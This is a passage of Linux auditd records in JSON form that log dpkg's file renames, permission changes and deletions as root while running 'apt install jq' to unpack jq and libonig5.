"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:650",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808434,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.965:651",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808434,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.965:652",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0008",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.969:653",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:654",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:655",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:656",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 7935,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:657",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 7935,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:658",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:659",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:660",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:661",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/README.dpkg-new",
"inode": 808435,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:662",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:663",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:664",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:665",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/changelog.Debian.gz.dpkg-new",
"inode": 808436,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.973:666",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/bin/jq.dpkg-new",
"inode": 808431,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/bin/jq",
"inode": 808431,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.977:667",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/jq/AUTHORS.gz.dpkg-new",
"inode": 808433,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/jq/AUTHORS.gz",
"inode": 808433,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.977:668",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/jq/copyright.dpkg-new",
"inode": 808434,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/jq/copyright",
"inode": 808434,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
